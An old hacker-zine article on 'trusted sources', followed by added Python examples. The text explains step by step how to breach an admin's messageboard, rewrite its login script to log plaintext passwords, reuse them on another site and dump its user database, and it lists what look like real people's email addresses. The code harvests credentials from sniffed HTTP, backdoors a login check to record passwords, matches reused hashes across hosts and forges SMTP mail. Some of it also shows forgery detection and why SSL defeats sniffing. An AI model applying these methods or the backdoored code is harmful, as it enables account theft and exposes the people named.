They're not just trusted hosts, but trusted sources
Creator: m101

Have you ever thought to yourself, "now how the hell did that computer get hacked? Was that really possible? This just doesn't make sense, that computer only had a single unvulnerable service, it can't have been hacked..." Apart from the extensive use of 0day exploits to hack into seemingly invincible systems, it really doesn't seem possible for many hacks to have taken place. However, you are sadly mistaken: a system is only as secure as the paranoia of its users. Everyone has heard of trusted hosts and how they can be used to break into computer systems, but there is a larger scope than this. That is why I call them trusted sources.

One of the most famous hacks on record (not necessarily the most impressive) was the one done by Mitnick to hack into Tsutomu Shimomura's "secure" box. Mitnick first knocked the trusted client box off the network (a SYN flood), then spoofed that client's address with predicted TCP sequence numbers so his own connection appeared to be the client's; from there he could easily do what he wanted, as he was now a trusted source. Now, not everyone is vulnerable to this, and it can also be an extremely difficult exercise to perform these days, but the principles and ideas behind it can be used in many situations.

Here is a situation that will truly show you how to hack hotmail. I can already hear all the kiddies yelling for joy. Although gaining root access on the server is pretty damn tricky, the average kiddie wishes to gain access to a friend's, enemy's or girlfriend's email account for reasons of all types of bullshit. Anyway, let's set the situation up a little: the hacker wants to break into the target's email account, and the target isn't stupid enough to give anyone their password. This would theoretically stop most people straight away from gaining access. Let's look at what happens when the target attempts to log in to hotmail with their all-important password.

The target walks to their computer and sits down to use it. Next they connect to the internet and request hotmail's login page. Then, after receiving it, they send their password to hotmail to authenticate themselves. They are now logged in. So you ask, where is the vulnerability in the situation? Let's break the process down further and discover the trusted sources:

Target--Computer--ISP--Hop1--Hop2..HopX--Hotmail Domain

So from here we have the following trusted sources between the target and hotmail:

Their computer
The ISP
Hop number 1
...
Hop number X

Generally X would be roughly at least 10, so counting their computer and the ISP there are at least a dozen trusted sources in between the target and hotmail. The target has unwillingly just trusted their password to a number of total strangers. If any single one of these sources was to be hit by the hacker, then they would gain the target's password through simple packet sniffing. (This only works because the login form is submitted over plain HTTP; if the same login went over SSL, a sniffer at a hop would get nothing but ciphertext.) This case was just to give you an idea of how bad trust can be, but it probably still doesn't explain how to hack the unhackable.

Let us take a real target and see how it may be flawed. Cyberarmy is an excellent example, but how would you gain access? Well, here is how the system was once set up to the public:

www.cyberarmy.com
ca-pr.info
ca-osi.org
ca-cia.org
kkine.org
exploitresearch.net

These at one point were the main domains of Cyberarmy, but I can guarantee you that hacking a single target is not going to gain you access to the main domain, so how is it possible to hack the main page? Here is the major list directly off the main site:

## Structure:
The CyberArmy - C/O: Commander in Chief scanjack
X/O: ViceCinC wa1+00k
X/O: ViceCinC -ang
Gen Penguin
Mar dimplex
Ret. CinC Chawmp
Mar narkle
CyberArmy University - Gen SHEPHERD
CyberArmy Privacy Commission - Gen Tacheon
Open Source Institute - ViceCinC barneyboy
Special Operations - Gen kifnab
Ready Response - ViceCinC -ang
CyberArmy Public Relations - Mar CHi
CyberArmy Intelligence Agency - Gen 4eto
CyberArmy IRC - Gen wewalkin
CyberArmy Exploit Research - Gen Goldfish
Internal Command - Mar axem
CyberArmy Service And Support - Gen Goliath

That's eighteen names on the list of people who run the sites as admins. However, they do not all have access to the main domain; in fact only scanjack and one or two more have it. Also, the password system randomly generates new passwords for the accounts on a regular basis.

The first thing is to pick a target host, then play with it and see if we can somehow exploit it. The newest host in the list is actually ca-osi.org, the Open Source Institute of Cyberarmy. The guy who runs it (barneyboy) ain't too bad a bloke. After a bit of research into the site, we find the following people appear to have privileged rights to the server:

barneyboy barneyboy@mail.com
Xenic xenicp@yahoo.es
aton aton1667@hotmail.com
shn webmaster@shnonline.com
pertinax pertinax@completeecom.com
fightgravity anon.ymous28@excite.com
efo efo@ca-osi.com
w0lf w0lf@ca-osi.com
liptop liptop@ca-osi.com
avataru avataru@ca-osi.com

So now we have a couple more sources for the tree. You can easily do a search on google for sites that these individuals visit, and from there gain even more sources. The target for example may be www.shnonline.com, the owner being of course "shn". After a bit of exploration of the website, we discover shn doesn't care too much about it and doesn't know how to update software that well. We find that his messageboard is vulnerable to a six month old vulnerability, and shn is too lazy to fix it. So of course we break into the site and head straight for the password files. On inspection, the MD5 hash it stores is of a damn long password, so brute forcing is useless. At this point many would give up, but you have to remember that shn would obviously believe that his OWN site is a trusted host, so, already having access, it is quite easy to make the login script save plaintext passwords to a separate file. After the necessary changes are made, a week later shn logs in to check his messageboard and BAM! We now have his plaintext password and he is none the wiser.

From this point shn probably doesn't care too much; what the hell is anyone going to do with shnonline.com? Absolutely nothing. However, we now try his password on ca-osi.com and find..... IT WORKS! That's right, we have now broken the trust barrier of one individual to gain access to another host. Now, ca-osi just so happens to be another one of them php nuke sites, and since shn is an admin, we can just click a few buttons and download the user database. What goodies would you expect to find in the database? Well, here are some possible examples:

merryb mbeekman@redhat.com Federal Marketing Manager
-im abr@pandora.be http://www.abrecurity.com
ieetglue ieetglue@exploitresearch.net http://www.exploitresearch.net
dai(o dai(o@irc-dev.net http://www.ionh:.com
gabbana gabbana@kkine.org http://www.kkine.org
Paradox dfayra00@umail.ucb.edu
VooDoo VooDoomaster@secureroot.com
elybi elybi@getroot.net http://www.getroot.net
oleg o.uru@cuohio.edu
raykorx raykorx@earthlink.net www.raykorx.com

(These are just general addresses that were gathered from around the net.)

From this small list there is a high possibility we could get ourselves a few web servers, .edu accounts and various other interesting things. The average database will contain all types of juicy information, and guess what, you would have just violated around 500 people's trusted sources in one go. As you can see from this, you could now use the new information, and the trusted source itself, to gain more and more access to the systems. From there I'm sure you could find a way to gain access to one of the leaders' personal computers, and from there easily log their password to access the main website. If you are wondering, this was ONLY a case study, not an actual hack.

Here's another quick case study of how totally stupid most people are. Everyone knows the problems that exist in smtp to allow people to forge mail (nothing in the protocol checks that whoever is connected is entitled to the MAIL FROM address or the From: header they supply), but not many people even consider how it could also become a powerful trusted source. I guarantee that if you were to receive an email from your girlfriend or best mate that didn't look sus, you would happily open it and not even realise you've just installed a trojan on your box.

Trusted sources come into everything; you don't have to think much to find them. It all really just turns into a mass amount of social engineering. A target is only really as secure as the amount of effort the hacker puts into breaking it. The same applies to most situations in life: your house key doesn't protect from someone running a car through the door, does it? No it doesn't, it only stops the casual burglar with not much intent....
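Back to the hotmail hop chain: this is what "simple packet sniffing" at one of those hops actually yields, as an added example (my code, not anything from the article). The three captured payloads are constructed for the example, the host name is made up, and the form field names login and passwd are assumptions rather than a real Hotmail form. The third payload shows the same hop's view when the login goes over SSL instead.

```python
"""Pulling a password out of a sniffed login (added example, not the
article's own code).  Any hop in the Target--...--Hotmail chain sees the
raw TCP payload; if the login goes over plain HTTP this is all it takes
to read it.  Captured requests below are constructed for the example and
the form field names (login, passwd) are assumed, not a real Hotmail form.
"""
import base64
from urllib.parse import parse_qs

# Constructed sample 1: a login form submitted over plain HTTP.
CAPTURED_FORM_POST = (
    b"POST /cgi-bin/dologin HTTP/1.0\r\n"
    b"Host: login.example.net\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 33\r\n"
    b"\r\n"
    b"login=target&passwd=s3cret%21&x=1"
)

# Constructed sample 2: HTTP Basic auth, base64 of "target:s3cret!".
CAPTURED_BASIC_AUTH = (
    b"GET /private/ HTTP/1.0\r\n"
    b"Host: login.example.net\r\n"
    b"Authorization: Basic dGFyZ2V0OnMzY3JldCE=\r\n"
    b"\r\n"
)

# Constructed sample 3: the first bytes of a TLS ClientHello record; this
# is what the same hop sees when the login form is served over SSL.
CAPTURED_TLS_HELLO = b"\x16\x03\x01\x00\x2f\x01\x00\x00\x2b\x03\x03" + b"\x00" * 32

HTTP_METHODS = (b"GET ", b"POST ", b"PUT ", b"HEAD ")
CREDENTIAL_FIELDS = {"login", "username", "user", "email",
                     "passwd", "password", "pass", "pw"}


def parse_http_request(raw):
    """Split a raw request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def extract_credentials(raw):
    """Return whatever credential material the payload carries, or {}."""
    if not raw.startswith(HTTP_METHODS):
        return {}                      # not cleartext HTTP: nothing readable
    method, _path, headers, body = parse_http_request(raw)
    found = {}
    # Form logins: url-encoded fields in the POST body.
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        length = int(headers.get("content-length", len(body)))
        fields = parse_qs(body[:length].decode("latin-1"), keep_blank_values=True)
        for name, values in fields.items():
            if name.lower() in CREDENTIAL_FIELDS:
                found[name] = values[0]
    # HTTP Basic auth: user:password, merely base64-encoded.
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            found["user"], found["password"] = user, password
        except (ValueError, UnicodeDecodeError):
            pass
    return found


def harvest(payloads):
    """Run each reassembled payload through the extractor; keep the hits."""
    return [creds for creds in map(extract_credentials, payloads) if creds]
```

A real sniffer would reassemble the TCP stream first; the extractor above starts where that leaves off, and it deliberately gives up on anything that is not cleartext HTTP, which is the whole difference SSL makes to the hops.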
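The shnonline to ca-osi step in the case study, as an added example in Python standing in for the messageboard's PHP (illustrative code, not the messageboard's or php nuke's own): the honest MD5 login check, the one-line addition that makes it tee every submitted password in the clear, and the reuse check that takes the recovered plaintext to other hosts' dumped user tables. The hosts are the article's, but every user table, hash and password below is constructed for the example.

```python
"""Password logging on a 'trusted' own site, then reuse across hosts
(added example; not the article's or any messageboard's code).
"""
import hashlib


def md5_hex(password):
    """Unsalted MD5, the way the article's messageboard stores passwords."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Constructed data: shn's long password and three hosts' user tables
# (user -> stored hash), as the admin panels of those sites would dump them.
SHN_PASSWORD = "frankly-my-dear-i-dont-give-a-damn-1939"
USER_TABLES = {
    "shnonline.com": {
        "shn": md5_hex(SHN_PASSWORD),
        "guest": md5_hex("guest"),
    },
    "ca-osi.org": {
        "barneyboy": md5_hex("not-the-same-one"),
        "shn": md5_hex(SHN_PASSWORD),          # the reused password
        "w0lf": md5_hex("another-one"),
    },
    "kkine.org": {
        "gabbana": md5_hex("something-else"),
    },
}


def check_login(user_table, user, password):
    """The honest login check: hash what was submitted, compare to the table."""
    stored = user_table.get(user)
    return stored is not None and stored == md5_hex(password)


def check_login_backdoored(user_table, user, password, captured):
    """Identical to check_login except for the intruder's one addition: the
    submitted user/password pair is recorded in the clear before it is ever
    hashed.  The real thing appends to a file under the web root; here
    `captured` is a list so the example runs without touching disk."""
    captured.append((user, password))
    return check_login(user_table, user, password)


def find_reuse(plaintext, user_tables):
    """Given one recovered plaintext, list every (host, user) whose stored
    hash matches it, i.e. every account the same password opens."""
    target = md5_hex(plaintext)
    return [(host, user)
            for host, table in user_tables.items()
            for user, stored in table.items()
            if stored == target]


def shared_hashes(user_tables):
    """Unsalted hashes leak reuse even before any plaintext is known:
    identical hash values on two hosts mean identical passwords.  Returns
    {hash: [(host, user), ...]} for hashes seen on more than one host."""
    seen = {}
    for host, table in user_tables.items():
        for user, stored in table.items():
            seen.setdefault(stored, []).append((host, user))
    return {h: owners for h, owners in seen.items()
            if len({host for host, _ in owners}) > 1}
```

The point of shared_hashes is the flip side of the article's "brute forcing is useless": with unsalted MD5 you do not need shn's plaintext to know his ca-osi account opens with the same password, only his two dumps side by side. The plaintext just saves you the trouble of finding which one it is.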
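The smtp case study, as an added example (my code, not the article's): a toy relay that, like the relays of the day, accepts whatever the client claims in HELO and MAIL FROM, a sender that uses that to post mail "from" the girlfriend, and the check a reader or filter can still run on the two headers the relay stamps on itself. Hostnames, addresses and the KNOWN_SENDERS table (a stand-in for a per-domain list of legitimate mail servers, the idea SPF later standardised) are all made up; the IPs are from the documentation ranges.

```python
"""Forged mail from a 'trusted' sender and the traces it leaves (added
example, not the article's code).  Every field the sender supplies can be
chosen freely; the one thing the relay records that the sender cannot pick
is the IP address the connection came from.
"""


class ToyRelay:
    """A 1990s-style SMTP relay as a state machine: no sender checks at all."""

    def __init__(self, hostname="mx.example.org"):
        self.hostname = hostname
        self.mailbox = []          # delivered messages, as stored text
        self.helo = None
        self._reset_transaction()

    def _reset_transaction(self):
        self.mail_from = None
        self.rcpts = []
        self.in_data = False
        self.data_lines = []

    def handle(self, line, client_ip):
        """Feed one client line; return the server reply ('' while in DATA)."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                stamped = [f"Return-Path: <{self.mail_from}>",
                           f"Received: from {self.helo} ({client_ip}) by {self.hostname}"]
                self.mailbox.append("\r\n".join(stamped + self.data_lines))
                self._reset_transaction()
                return "250 OK: queued"
            self.data_lines.append(line[1:] if line.startswith(".") else line)
            return ""
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip()
            return f"250 {self.hostname}"
        if verb == "MAIL":                      # no check whatsoever on the sender
            self.mail_from = arg.split(":", 1)[1].strip().strip("<>")
            return "250 OK"
        if verb == "RCPT":
            self.rcpts.append(arg.split(":", 1)[1].strip().strip("<>"))
            return "250 OK"
        if verb == "DATA":
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Unknown command"


def send_mail(relay, client_ip, helo, envelope_from, header_from, rcpt, subject, body):
    """Drive one complete SMTP exchange; return (transcript, stored message)."""
    data = [f"From: {header_from}", f"To: {rcpt}", f"Subject: {subject}", ""] + body.split("\n")
    data = ["." + l if l.startswith(".") else l for l in data]     # dot-stuffing
    commands = ([f"HELO {helo}", f"MAIL FROM:<{envelope_from}>", f"RCPT TO:<{rcpt}>", "DATA"]
                + data + [".", "QUIT"])
    transcript = [(cmd, relay.handle(cmd, client_ip)) for cmd in commands]
    return transcript, relay.mailbox[-1]


# Constructed: the IPs genuinely allowed to send mail for a domain.
KNOWN_SENDERS = {"girlfriend.example": {"203.0.113.25"}}


def _domain(addr):
    if "<" in addr:
        addr = addr[addr.index("<") + 1:addr.index(">")]
    return addr.strip().rsplit("@", 1)[-1].lower()


def headers_of(message):
    hdrs = {}
    for line in message.split("\r\n\r\n", 1)[0].split("\r\n"):
        name, _, value = line.partition(":")
        hdrs.setdefault(name.strip().lower(), []).append(value.strip())
    return hdrs


def forgery_flags(message, known_senders=KNOWN_SENDERS):
    """Red flags a reader or filter can raise from the relay's own stamps."""
    h = headers_of(message)
    from_dom = _domain(h["from"][0])
    flags = []
    if _domain(h["return-path"][0]) != from_dom:
        flags.append("envelope sender does not match From:")
    received = h["received"][0].split()            # from HELO (IP) by ...
    helo, ip = received[1], received[2].strip("()")
    if helo != from_dom and not helo.endswith("." + from_dom):
        flags.append(f"HELO name {helo} is not in {from_dom}")
    if from_dom in known_senders and ip not in known_senders[from_dom]:
        flags.append(f"sent from {ip}, not a known mail server for {from_dom}")
    return flags
```

A careless forger trips all three checks; a careful one sets HELO and the envelope to match the From: line and trips only the last, which is why the connecting IP is the only header worth trusting, and why a mail that "looks like" it came from your best mate proves nothing on its own.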